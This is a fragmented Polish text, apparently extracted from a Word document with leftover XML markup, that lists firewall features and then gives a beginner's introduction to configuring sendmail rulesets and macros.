WWW)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szyfrowanie przesylanych informacji przy zastosowaniu sprawdzonych technik kryptograficznych oraz efektywnych algorytmow generowania i dystrybucji kluczy szyfrowania (DES, RC-4, FWZ-1, MD5, SHA-1, SKIP, IPSec, IKE), dane sa zabezpieczone w zakresie utrzymywania ich poufnosci, integralnosci i wiarygodnoscizapewniajac bardzo wysoki poziom bezpieczenstwa transmitowanych informacj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umozliwiaja zarzadzanie i dostep do urzadzen SNMP w sieci lokalnej, Intranecie lub sieci rozleglej bez wystawiania systemu na niebezpieczenstwo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spolpracuja z najwazniejszymi systemami potwierdzania autentycznosci (np. SecurID, RADIUS, AXENT, TACACS, Vasco, S/Key) prowadzone dla wszystkich (ponad 100) kontrolowanych uslug sieciowych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skanowanie WWW pod wzgledem zawartosci apletow Java, procedur ActiveX i innych potencjalnie niebezpiecznych dodatkow do HTML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ykrywanie i blokowanie najbardziej niebezpiecznych technik wlaman np. "Spoofing", "SYN Flood", "LAND", "Ping of Death", "WinNuk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zapewniaja bezpiecznego serwera poczty elektronicznej, w ktorej przesylki SMTP podlegaja wnikliwej kontroli zawartosc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rozliczanie pracownikow przedsiebiorstwa w zakresie uzytkowania uslug internetowych (np. mozna dowiedziec sie z jakich serwerow korzystali uzytkownicy, w jakim czasie i jak dlugo to robili, jakie pliki przegladali oraz ile bajtow informacji zostalo przeslanych)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monitorowanie aktywnych sesji sieciowych umozliwia administratorowi sledzenie i blokowanie niebezpiecznych sesji sieciowych w czasie rzeczywistym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prowadzenie analizy zdarzen rejestrowanych przez system zaporowy razem z zapisami kontrolnymi odnotowanymi na ruterach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Zapory ogniowe nie-komercyj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dnak nie wszystkie Zapory Ogniowe skladaja sie z kilku czesci. Istnieja Zapory przeznaczone do uzytku nie-komercyjnego, ktore sluza do ochrony pojedynczych komputerow. Zapory te zapewniaja powierzchowna ochrone danych, nie posiadaja rozbudowanych opcji ochrony. Jednak dla przecietnego uzytkownika sieci jest to wystarczajace. W ich opcjach mozemy znalezc ochrone przed: koniami trojanskimi, wirusami w listach, przed wysylaniem plikow przez ICQ itp. Ich glowna cecha I najwazniejsza cecha jest blokowanie dostepu do naszego komputera z internetu. Wsrod zapor nie-komercyjnych pojawiaja sie takie, ktore w szczegolnosci maja za zadanie blokowania portow uzywanych przez konie trojanskie jak i zapory, ktore specjalizuja sie w wychwytywaniu wirusow przychodzacych mail'ami jak i "omnibusow" majacych wszystkie te funkcje wbudowa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right"/>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Jakub "Gutek" Gutkowsk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DODATKI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Krótka i polska instrukcja konfigurowania sendmaila &lt;&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nizszy tekst ma za zadanie dac minimalne niezbedne pojecie o sendmailu, tak bys mogl sie nim jako tako poslugiwac. Nie odpowiadam za zadne szkody wyrzadzone przez wykonywanie tu zamieszczonych wskazowek, gdyz sam jestem w pewnym sensie nowicjuszem jesli chodzi o sendmaila. To co tu zamieszczam to mniej wiecej streszczenie zawartosci "Sendmail Instalation &amp; Operation Guide" Erica Allmana. Mam nadzieje, ze bedzie ono dla wielu wystarczajace. Jesli nie - zawsze pozostaje oryginal, oraz alternatywne zrodla informacj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endmail to taki "robot pocztowy". Wykonuje on rozne prace z listami. Do najwazniejszych zalicza sie resolvowanie (transformowanie do porzadanej postaci) adresow pocztowych, oraz przekazywanie pracy odpowiednim programom do dostarczania poczty. Jest jeszcze zapewne masa innych zastosowan, ale nie bedziemy o tym specjalnie pisa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Gdy list jest "walkowany" przez sendmaila, przechodzi on (w teorii) przez 5 podstawowych rulesetow. (Rulesety to takie zestawy regul, wedlug ktorych sendmail transformuje adresy listu, oraz wyciaga z nich uzyteczne informacje). W kolejnosci wykonywania sa to: ruleset 3, ruleset 0, ruleset 1 i 2, ruleset 4</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Ruleset 3:</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onwertuje adresy do postaci kanonicznej (user@&lt;domena&gt;dodatkowa_informacj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Ruleset 0:</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yciaga z adresu informacje o tym, jaki uzytkownik odbiera poczte, d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akiego hosta dostarczyc poczte oraz to, jakiego mailera uzyc d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ostarczenia tej poczty (np. mailer lokalny, it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Ruleset 1 i 2:</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ykonuja transformacje adresow specyficzne dla mailera. (ja ich w ogole nie mam w moim sendmail.cf).</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Ruleset 4:</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luzy on do ostatecznego przeksztalcania adresow z postaci wewnetrznej</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 zewnetrzn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obrze. Wiemy juz, ktory ruleset do czego sluzy, teraz sprobujmy s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uczyc pisac rulesety. Jest to dosc nieczytelne, ale za to w miare prost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efinicje rulesetu (tzn. zestawu regul do transformowania adres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ykonujemy, wpisujac w sendmail.cf nastepujaca linijk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Sn</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dzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> jest numerem ruleset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o tej linijce definiujemy poszczegolne reguly, definiujac kazda z nich w ten sposob:</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Rlhs rhs komentarz</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dzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>lhs</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rhs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>komentarz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> sa trescia, okreslajaca co dana regula ma robic. Miedzy tymi elementami (lhs, rhs i komentarz) musi wystapic przynajmniej jeden znak tabulacji, by zostaly odroznion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Teraz pokaze, jak pisze sie reguly. Na poczatek wyjasnijmy sobie jednak co to jest lhs i rhs (co to komentarz, to chyba kazdy wie, ale na wszelki wypadek - jest to tekst ignorowany przez program). Wrocmy jednak do tego </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>lhs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>rhs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Lhs to "left hand side", rhs to "right hand side". Lhs to tak jakby "argumenty" reguly, rhs to jakby "wynik" reguly. Ogolnie - adres wpada na regule - w tym momencie w lhs wylapujemy z niego interesujace nas elementy, a nastepnie w rhs zapisujemy je w odpowiadajacej nam konwencj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W </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>lhs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> mozna korzystac z nastepujacych symbol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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> lub wiecej odpowiadajacych formule lancuchow znakow.</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> lub wiecej odpowiadajacych formule lancuchow znakow.</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xml:space="preserve"> dokladnie 1 odpowiadajacy formule lancuch znakow.</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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> porownuje lancuch znakow z lancuchami klasy x.</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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> wybiera lancuch znakow, jesli nie wystepuje on w klasie x.</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Kazdy z powyzszych symboli, po zaladowaniu przechodzi na rhs jako </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>$n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, gdzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to pozycja, w ktorej wystapil ten symbol w lhs. n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 lhs dla stringu "UCBARPA:eric", wypluje na rhs dwa $n'y o wartoscia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1  UCBARP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2  eri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odatkowo w lhs mozna rowniez uzywac symbolu $@, ktory oznacza, ze nic nie jest pobiera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sli w lhs ktorys z symboli nie potrafi wykonac zadania, regula jes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rzerywan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rzejdzmy teraz do opisu rhs. Mozna tu uzywac nastwpujacych symbol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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        to juz opisalem przy okazji opisu lhs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nazwa$]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kanonizuje nazwe. Np. przeksztalca adres cyferkowy w kanoniczny, lub aliasy na adres kanoniczny. Pokaze tu przyklady z "SIOG'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csam$] zostanie przeksztalcone do "lbl-csam.arpa", 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128.32.130.2]$] przeksztalci sie na "vangogh.CS.Berkeley.ED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pa klucz $@argumenty $:wartosc_domyslna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apuje ciag znakow wedlug okreslonej mapy. Bedzie o tym dalej.</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t;n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">       Wywoluje ruleset n. Musi byŠ to pierwszy element RHS, lub</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znajdowaŠ siŕ po </w:t>
      </w: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xml:space="preserve"> lub </w:t>
      </w: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nazwahosta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        Ustawia zmianna 'host' (ruleset 0)</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nazwausera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        Ustawia zmienna 'user' (ruleset 0)</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nazwamailera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">      Ustawia zmienna 'mailer' (ruleset 0) Dodatkowo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ab/>
        <w:t xml:space="preserve">    przerywa wykonywanie ruleset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Uwaga: Ostatnich trzech wartosci uzywa siŕ tylko w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>rulesecie 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, a uzycie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">$# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>sygnalizuje koniec obrobki adresow. PostaŠ takiej komendy to zwykle RHS-ow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iler $@host $:uzytkownik</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oza tym, </w:t>
      </w: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xml:space="preserve"> i </w:t>
      </w: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xml:space="preserve"> maja specjalne znaczenia, jesli wystepuja na samym poczatku RHS. Normalnie dana regula jest wykonywana tak dlugo, jak dlugo adres pasuje do LHS. </w:t>
      </w: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xml:space="preserve"> kaze zakonczyc ruleset z reszta RHS jako aktualna wartosci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xml:space="preserve"> powoduje zakonczenie reguly, lecz ruleset bedzie wykonywany dalej.</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o jest narazie wszystko z podstawowych komend rulesetowych. Istniej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szcze kilka innych, powiazanych z bardziej szczegolowymi zagadnieniami, ktore porusze nizej.</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Makr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akra to takie cuda, ktore po wywolaniu (o ile sa ustawione) zwracaj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kreslona wartosc. Makra definiuje sie w nastepujacy sposob:</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Dxwar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dzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to nazwa makra, a wart to wartosc, ktora makro zwrac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Makr uzywamy, korzystajac z symbolu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>$x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, gdzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to nazwa makra. System makr umozliwia nam rowniez tworzenie instrukcji warunkowych, poprzez sprawdzanie tego czy makro jest ustawione, czy n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x tekst1 $| tekst2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Co wprowadzi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>tekst1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, jesli makro jest ustawione, lub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>tekst2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, jesli makro nie jest ustawione. (przyklad znajdziesz w sendmail.cf - wykorzystanie w ten sposob makra o nazwie x, ktore przechowuje imie i nazwisko nadawc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akra oznaczone malymi literami maja specjalne znaczenie, makra oznaczone duzymi literami sa zarezerwowane dla autorow plikow konfiguracyjnych. Oto lista makr "malo-literkowych" ;-)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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> data nadania w formacie rfc822</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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> data bierzaca w formacie rfc822</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c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> licznik "obrobien" listu. (ile razy list byl traktowany sendmaile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podczas dostarczani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d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> data bierzaca w formacie unixowym (ctim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e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> komunikat powitalny SMTP</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f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> adres nadawcy</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> adres nadawcy w stosunku do odbiorcy (??) chyba chodzi o minimaln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rozroznialny adres miedzy nimi...?</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h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> host odbiorcy</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i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> id kolejki</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j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> oficjalna nazwa danego site'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k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> nazwa wezla UUCP</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l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> format unixowego pola "From:"</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m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> zwraca nasza domen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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> nazwa deamona uzywanego do obslugi komunikatow o bledach</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o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> lista znakow, ktore rozdzielaja tekst na kawalki, ktore moga jednak by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uzywane w tych "kawalkach". Nie jestem ekspertem sendmaila, al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pekuluje, ze mozliwe, iz ma to zastosowanie przy symbolach $+, itp.</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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> numer id procesu sendmail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q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> domyslny adres nadawcy - zwykle $?x$x&lt;$g&gt;$|$g$. (patrz konstrukcj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warunkow z uzyciem makr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r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> protokol, jakim zostal nadany list</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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> nazwa hosta wysylajacego</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t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> numeryczna reprezentacja bierzacego czas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u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> nazwa uzytkownika odbiorcy list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v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> wersja sendmail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w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> nazwa hosta tego site'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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> imie i nazwisko (zazwyczaj ;-) - czyli pelna nazwa uzytkownik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nadawcy</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z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
